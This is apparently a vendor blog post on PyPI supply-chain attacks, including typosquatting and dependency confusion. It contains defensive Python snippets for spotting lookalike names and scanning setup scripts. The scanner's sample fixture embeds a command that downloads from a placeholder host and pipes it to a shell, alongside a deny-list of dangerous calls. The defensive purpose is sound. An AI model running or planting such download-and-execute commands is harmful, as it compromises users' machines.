Last Updated: March 10, 2022

Secure PyPI? The Problem with Trusting Open Source Repositories

If you work with open source Python packages, your business relies on the integrity of the Python ecosystem in general, and specifically on the Python Package Index (PyPI), where the vast majority of Python packages are hosted. But is that trust warranted?

To be clear, we love Python and depend on PyPI as a critical resource for our business, just like so many other enterprises. The people who develop and maintain it as a public resource for all of us do good work, but PyPI is not the App Store. Perhaps the time has come to make the case that it should be.

ActiveState recently published our Supply Chain Security survey, which included results compiled from over 1,500 coders, security personnel, and open source leaders at organizations both big and small, worldwide. The results indicate that far too many organizations (no matter their size) continue to implicitly trust open source language repositories like PyPI.

Implicit Trust in Public Repos

This is despite the fact that:

  • PyPI contains hundreds of thousands of packages created by tens of thousands of authors and maintainers, all of whom must be trusted. Given that anyone can upload a package to PyPI, this seems like a foolhardy assumption at best, if not downright dangerous. 
  • PyPI has no gatekeepers, and only a limited set of safeguards (e.g., you can’t upload a package with a name that’s already taken). There’s simply nothing stopping a developer from uploading malware since PyPI code isn’t audited, independently reviewed, or even scanned in depth.

The message is clear – user beware, which pushes the overhead of checking the security and integrity of every package to every organization that uses them – a massive waste of computing resources when taken globally. While plans have existed for years to create better security for PyPI, the actual implementation still lags the need. This post explores some of the alternatives organizations may want to consider in the meantime.

Rising PyPI Threats to the Software Supply Chain

Software supply chain attacks have been on the rise for many years, but have increased exponentially since the start of the pandemic. The majority of supply chain attacks take advantage of the lax security of open source repositories to upload a number of different exploits, including: 

  • Pytosquatting, which is typosquatting for the Python ecosystem. On the web, typosquatting occurs when bad actors register near-miss domain names in the hope you won’t spot the spelling difference (e.g., amazan.com), or else hope you’ll mistype the site name (e.g., amazin.com). In PyPI, pytosquatters register near-miss names of popular packages or otherwise create believable package names that they hope you’ll download and install by mistake.
  • Dependency confusion has recently become even more popular than typosquatting. It occurs because PyPI provides no support for namespacing. As a result, bad actors can guess the name of a package your organization may have created internally (e.g., amazon_requests), and then upload a newer version of it to PyPI, from which your tooling may inadvertently pull it. Some of the biggest enterprises on the planet have been affected by this exploit, including Apple, Microsoft and Tesla.
  • Identity hijacking, which occurs when a bad actor guesses or cracks an author’s password, or else offers to take over an abandoned or neglected project that the original owner no longer has time to look after.
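
To make the dependency confusion scenario concrete, here is a minimal sketch of a resolver that treats every index equally and simply picks the highest version number. It is a simplified model for illustration, not how any particular installer is implemented. The index contents, the version numbers, and the helper names (parse_version, naive_resolve, find_confusable) are all assumptions made up for this example; only the amazon_requests name comes from the text above.

```python
from typing import Dict, Iterable, List, Tuple

# Hypothetical index contents: package name -> list of available versions.
INDEXES: Dict[str, Dict[str, List[str]]] = {
    "internal": {"amazon_requests": ["1.0.0", "1.2.0"]},
    "public": {"amazon_requests": ["99.0.0"], "requests": ["2.27.1"]},
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn a simple dotted version such as '1.2.0' into a comparable tuple."""
    return tuple(int(part) for part in text.split("."))


def naive_resolve(
    name: str, indexes: Dict[str, Dict[str, List[str]]]
) -> Tuple[str, str]:
    """Pick the highest version of `name` across all indexes, ignoring origin."""
    candidates = [
        (parse_version(version), index_name, version)
        for index_name, packages in indexes.items()
        for version in packages.get(name, [])
    ]
    if not candidates:
        raise LookupError(f"{name} not found in any index")
    _, index_name, version = max(candidates)
    return index_name, version


def find_confusable(
    internal_names: Iterable[str], public_names: Iterable[str]
) -> List[str]:
    """List internal package names that also exist on the public index."""
    return sorted(set(internal_names) & set(public_names))


# The attacker's 99.0.0 upload wins because it has the highest version number.
print(naive_resolve("amazon_requests", INDEXES))
print(find_confusable(INDEXES["internal"], INDEXES["public"]))
```

In this toy model the internal 1.2.0 release loses to the public 99.0.0 upload purely on version number. A check like find_confusable, run against the names of your internal packages, is one way to spot a name that someone else has claimed publicly.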

Unfortunately, such attacks occur all too often. While the folks who run PyPI are quick to remove exploits when made aware of them, a compromised package that’s available even for just a few days can negatively impact hundreds of thousands of users. For example, one researcher registered more than 1,000 package names by eliminating separators like _ or - in the names of the top 10,000 packages on PyPI. The result:

“In a little over two years there have been 530,950 total pip install commands run on 1,131 packages.”
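
The separator trick is easy to check for. The sketch below flags a candidate name that collides with a popular package once separators are stripped, while ignoring names that are merely alternate spellings of the same project under the standard name normalization (runs of -, _ and . are treated as equivalent). The POPULAR list and the function names are assumptions for illustration; in practice you would load a real list of top packages.

```python
import re
from typing import Iterable, List

SEPARATOR_RUN = re.compile(r"[-_.]+")

# Hypothetical stand-in for a list of popular package names.
POPULAR = ["python-dateutil", "typing_extensions", "requests"]


def normalize(name: str) -> str:
    """Normalize a project name: lowercase, separator runs become one '-'."""
    return SEPARATOR_RUN.sub("-", name).lower()


def strip_separators(name: str) -> str:
    """Remove every separator, as in the researcher's experiment."""
    return SEPARATOR_RUN.sub("", name).lower()


def separator_lookalikes(candidate: str, popular: Iterable[str]) -> List[str]:
    """Return popular packages that `candidate` imitates by dropping separators."""
    key = strip_separators(candidate)
    return sorted(
        name
        for name in popular
        if normalize(name) != normalize(candidate)  # not the same project
        and strip_separators(name) == key
    )


print(separator_lookalikes("pythondateutil", POPULAR))
print(separator_lookalikes("python_dateutil", POPULAR))
```

The first call reports python-dateutil as the likely target, while the second returns nothing because python_dateutil normalizes to the same project name.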

More troubling, in July 2020, the request package (note the typo: request and not requests) was downloaded over 10,000 times. It contained malware that installed a daemon in .bashrc, providing the attacker with a remote shell on the machine.

Progress Toward A Secure PyPI

PyPI is run by some very smart, dedicated folks who take security seriously, but who are limited by funding constraints. Still, they have pushed forward a number of projects recently, including:

  • The addition of two-factor authentication for PyPI login.
  • The ability to require an API token when uploading packages to PyPI.
  • A forthcoming project that will introduce “organization accounts” whereby authors can create an organization, invite other users to join, organize those users into teams, as well as manage ownership and permissions across multiple projects.
    • It’s also proposed that this project would provide namespace support in order to counter exploits like dependency confusion.

Unfortunately, these kinds of projects can take years to implement. In the meantime, there are a number of measures you can take to decrease the risk of importing code from open source repositories. For example, our Supply Chain Security survey indicated that respondents currently implement a number of “best practice” import checks, where possible:

[Figure: Best Practice Import Controls]

Depending on your appetite for risk and the time/resources you have available, you may also want to implement:

  • A routine that can flag suspect typosquatted packages 
  • A static code analysis tool
  • A quarantine area to park suspect packages for further investigation
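
As a rough illustration of how a static check can feed a quarantine decision, the sketch below parses a package’s setup script without executing it and flags calls that commonly appear in install-time malware. The deny-list, the sample script, and the function names are assumptions chosen for this example. A real static analysis tool uses far richer rules, and a check this simple is easy to evade (for instance, by aliasing an import).

```python
import ast
from typing import List, Tuple

# Assumed, illustrative deny-list of call names worth a closer look.
SUSPICIOUS_CALLS = {
    "eval",
    "exec",
    "os.system",
    "subprocess.Popen",
    "subprocess.run",
    "base64.b64decode",
}

# Hypothetical setup script for a typosquatted package.
SAMPLE_SETUP = '''
import os
from setuptools import setup
os.system("curl http://example.invalid/payload | sh")
setup(name="request")
'''


def dotted_name(node: ast.AST) -> str:
    """Rebuild a dotted name such as 'os.system' from a call target."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        prefix = dotted_name(node.value)
        return f"{prefix}.{node.attr}" if prefix else node.attr
    return ""


def scan_source(source: str) -> List[Tuple[int, str]]:
    """Return (line number, call name) pairs for suspicious calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


def triage(source: str) -> str:
    """Send a package to quarantine if the scan finds anything."""
    return "quarantine" if scan_source(source) else "allow"


print(scan_source(SAMPLE_SETUP))
print(triage(SAMPLE_SETUP))
```

Because the source is only parsed, never imported or run, the scan itself cannot trigger the payload. Anything it flags can be parked in the quarantine area for a human to review.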

Conclusions: Developers need secure Python packages that can be trusted, from end to end

While implementing best practices to reduce the risk associated with imported open source code is always a good idea, dealing with malicious packages as they come up can seem like an endless game of whack-a-mole. But going back to a time before open source packages made coding so much easier and quicker seems impossible given the complexity of modern applications.

As an alternative, 33% of our Supply Chain Survey respondents indicated that they prefer to work with a trusted vendor. Unfortunately, a vendor needs time to curate, license-verify, code-scan, build and distribute its packages. This delay is one of the reasons that organizations prefer to work with older versions of Python. But older versions may contain a number of vulnerabilities, creating a security tradeoff.

To help resolve this tradeoff, ActiveState has begun publishing a set of secure Python packages using our ActiveState Platform, which can build and make packages available in a matter of minutes for the latest versions of Python. Each package has been:

In this way, we’ve begun the process of creating a secure version of PyPI that anyone can use to download some of the most popular Python packages and install them with pip, including:

Many more are in the works. Give it a try and let us know what you think in our Community Forums.

Next steps:

If you’d like to obtain your own Hosted Artifact Repository that contains just the Python packages your organization requires, talk to our product experts.

Dana Crane


Experienced Product Marketer and Product Manager with a demonstrated history of success in the computer software industry. Strong skills in Product Lifecycle Management, Pragmatic Marketing methods, Enterprise Software, Software as a Service (SaaS), Agile Methodologies, Customer Relationship Management (CRM), and Go-to-market Strategy.